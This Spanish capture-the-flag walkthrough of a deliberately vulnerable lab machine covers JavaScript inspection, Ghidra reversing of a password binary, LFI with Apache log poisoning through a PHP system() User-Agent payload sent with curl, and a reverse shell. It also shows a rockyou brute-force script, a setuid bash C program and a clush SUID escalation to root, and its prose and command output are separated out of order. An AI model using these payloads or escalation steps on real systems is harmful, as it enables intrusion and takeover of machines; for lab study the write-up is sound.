Cuando obtenemos el .zip nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente.
unzipreverse.zip
Nos lo descomprimira y despues montamos la maquina de la siguiente forma.
bashauto_deploy.shreverse.tar
Info:
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
Por lo que cuando terminemos de hackearla, le damos a Ctrl+C y nos eliminara la maquina para que no se queden archivos basura.
Escaneo de puertos
Info:
Si entramos en la pagina vemos una bienvenida normal y corriente, pero si inspeccionamos la pagina y vamos al javascript veremos lo siguiente:
Basicamente cuando nosotros hacemos click muchas veces exactamente 20 nos aparece una alerta con el mensaje secret_dir:
Si nosotros metemos en la URL lo siguiente:
veremos un archivo llamado secret, si nos lo descargamos y vemos que tipo de archivo es:
Info:
Vemos que es una aplicacion .elf que si la ejecutamos vemos lo siguiente:
Info:
Vemos que esta procesando algo, si intentamos desbordar el buffer no lo conseguiremos, por lo que tendremos que probar otra cosa.
Ingenieria inversa
Vamos a utilizar Ghidra para decompilar el binario y ver si podemos encontrar la contraseña.
Esto nos abrira el programa, cargaremos el binario que queremos analizar, una vez cargado, veremos el codigo, de primeras veremos el main que contiene lo principal del codigo:
Aqui vemos una funcion interesante llamada containsRequiredChars que es la que verifica si la contraseña que hemos introducido es correcta o no.
Por lo que vamos a buscar el codigo de la funcion en el buscador donde pone filter de la parte izquierda del programa:
Seleccionando la funcion podremos ver en C en la parte de la izquierda el programa de esta funcion que seria el siguiente:
Por lo que vemos estamos viendo la contraseña en texto plano en varias partes de comparacion del programa, por lo que si las juntamos, veremos lo siguiente:
Probaremos esa contraseña en el programa.
Info:
Vemos que lo hemos conseguido y a cambio nos proporciona una cadena en base64, que se veria de la siguiente forma decodificado:
Parece ser un subdominio junto a un dominio, por lo que vamos a ingresarlo en nuestro archivo hosts, y posteriormente entrar a ver que nos encontramos.
Lo guardamos y pondremos lo siguiente en la URL:
Veremos algo tal que esto:
Local File Inclusion (LFI)
Si nos metemos en el siguiente link llamado experimentos interactivos veremos una URL asi:
Por lo que probaremos a poner /etc/passwd ya que tiene pinta de que puede ser vulnerable.
Info:
Vemos que funciona un LFI, por lo que vamos a probar a realizar un LOG POISONING, primero veremos si podemos entrar en los logs:
LOG POISONING
Info:
Veremos que si podemos entrar, por lo que probaremos a poner un whoami a ver si funciona:
Ahora si recargamos la pagina, veremos lo sisguiente:
Vemos que se nos esta ejecutando, por lo que nos haremos una reverse shell de la siguiente forma:
shell.sh
Creamos ese archivo y abriremos un servidor de python3 para pasarnos el archivo.
Por lo que pondremos lo siguiente:
Y cuando recarguemos la pagina es cuando se va a ejecutar el comando, por lo que la recargamos y si vamos al server de python3 vemos que ha funcionado por que veremos lo siguiente:
Vemos que lo ha pillado, ahora le pondremos permisos de ejecuccion de la siguiente forma:
Ahora lo ejecutaremos, pero antes nos pondremos a la escucha:
Y ponemos lo siguiente:
Recargamos la pagina y si vamos a donde tenemos la escucha, veremos lo siguiente:
Por lo que vemos ha funcionado, ahora sanitizaremos la TTY.
Escalate user nova
Si hacemos sudo -l veremos lo siguiente:
Vemos que podemos ejecutar el script password_nova como el usuario nova, si lo ejecutamos veremos lo siguiente:
Info:
Vamos a crearnos un script en bash que nos automatice esta tarea y pasarnos el rockyou a la maquina victima con wget.
brute.sh
Ahora nos pasaremos el rockyou.txt:
Y en la maquina victima ponemos lo siguiente:
Con esto ya podremos ejecutar el script:
Info:
Despues de un rato habremos encontrado la contraseña que seria BlueSky_42!NeonPineapple.
Por lo que haremos lo siguiente:
Metemos como contraseña BlueSky_42!NeonPineapple y seremos dicho usuario.
Escalate user maci
Si hacemos sudo -l veremos lo siguiente:
Vemos que podemos ejecutar /lib64/ld-linux-x86-64.so.2 como el usuario maci, por lo que haremos lo siguiente:
Vamos a crear un archivo que sera el siguiente:
malicious_binary.c
Y ahora vamos a compilarlo:
Hecho todo esto anterior, lo ejecutaremos de la siguiente forma bajo el usuario maci:
Y con esto ya seremos dicho usuario.
Escalate Privileges
Si hacemos sudo -l veremos lo siguiente:
Vemos que podemos ejecutar el binario clush bajo el usuario root, por lo que haremos lo siguiente:
Investigando mucho en internet vemos la siguiente pagina:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-24 09:42 EST
Nmap scan report for realgob.dl (172.17.0.2)
Host is up (0.000048s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: P\xC3\xA1gina Interactiva
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.76 seconds
let clickCount=0;const particleContainer=document.getElementById("particles");function createParticle(t,e){const n=document.createElement("div");n.classList.add("particle");n.style.left=`${t}px`;n.style.top=`${e}px`;n.style.width=`${Math.random()*10+5}px`;n.style.height=n.style.width;n.style.animationDuration=`${Math.random()*2+1}s`;particleContainer.appendChild(n);setTimeout((()=>{n.remove()}),3e3)}document.body.addEventListener("mousemove",(t=>{createParticle(t.clientX,t.clientY)}));document.body.addEventListener("click",(function(){clickCount++;if(clickCount>=20){alert("secret_dir");clickCount=0}}));
URL = http://<IP>/secret_dir
file secret
secret: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=387271a4e7dae83df80c4ca4453a3163c48d834f, for GNU/Linux 3.2.0, not stripped
chmod +x secret
./secret
Introduzca la contraseña: test
Recibido...
Comprobando...
Contraseña incorrecta...
curl -s -X GET 'http://g00dj0b.reverse.dl' -H "User-Agent:<?php system('bash shell.sh'); ?>"
listening on [any] 7777 ...
connect to [192.168.5.186] from (UNKNOWN) [172.17.0.2] 42806
bash: cannot set terminal process group (24): Inappropriate ioctl for device
bash: no job control in this shell
┌──[www-data@71c36e1f8f71]─[/var/www/subdominio]
└──╼ $ whoami
whoami
www-data
script /dev/null -c bash
# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>
Matching Defaults entries for www-data on 71c36e1f8f71:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User www-data may run the following commands on 71c36e1f8f71:
(nova : nova) NOPASSWD: /opt/password_nova
sudo -u nova /opt/password_nova
Escribe la contraseña (Pista: se encuentra en el rockyou ;) ): test
Contraseña incorrecta.
nano /tmp/brute.sh
#Dentro del nano
#!/bin/bash
# Ruta al archivo de diccionario rockyou.txt
wordlist="rockyou.txt"
# Comando que vamos a intentar ejecutar con las contraseñas
command="sudo -u nova /opt/password_nova"
# Recorremos cada palabra en el archivo de diccionario
while IFS= read -r password; do
# Intentamos ejecutar el comando con la contraseña actual
echo "Probando contraseña: $password"
echo "$password" | $command
# Comprobamos si el comando fue exitoso
if [ $? -eq 0 ]; then
echo "Contraseña encontrada: $password"
break
fi
done < "$wordlist"
cd /usr/share/wordlists/
python3 -m http.server
wget http://<IP>:8000/rockyou.txt
bash brute.sh
Probando contraseña: cuteangel
Escribe la contraseña (Pista: se encuentra en el rockyou ;) ): Contraseña correcta, mi contraseña es: BlueSky_42!NeonPineapple
Contraseña encontrada: cuteangel
su nova
Matching Defaults entries for nova on 71c36e1f8f71:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User nova may run the following commands on 71c36e1f8f71:
(maci : maci) NOPASSWD: /lib64/ld-linux-x86-64.so.2
#include <stdio.h>
#include <stdlib.h>
int main() {
setuid(0); // Hacer que el proceso tenga privilegios de root
setgid(0); // Establecer el grupo como root
system("/bin/bash"); // Ejecutar bash
return 0;
}
Matching Defaults entries for maci on 71c36e1f8f71:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User maci may run the following commands on 71c36e1f8f71:
(ALL : ALL) NOPASSWD: /usr/bin/clush
$ clush -w node[11-14] -b
Enter 'quit' to leave this interactive mode
Working with nodes: node[11-14]
clush> uname
---------------
node[11-14] (4)
---------------
Linux
clush> !pwd
LOCAL: /root
clush> -node[11,13]
Working with nodes: node[12,14]
clush> uname
---------------
node[12,14] (2)
---------------
Linux
clush>
sudo clush -w node[11-14] -b
Enter 'quit' to leave this interactive mode
Working with nodes: node[11-14]
clush> !id
LOCAL: uid=0(root) gid=0(root) groups=0(root)
clush> !chmod u+s /bin/bash
ls -la /bin/bash
-rwsr-xr-x 1 root root 1265648 Mar 29 2024 /bin/bash
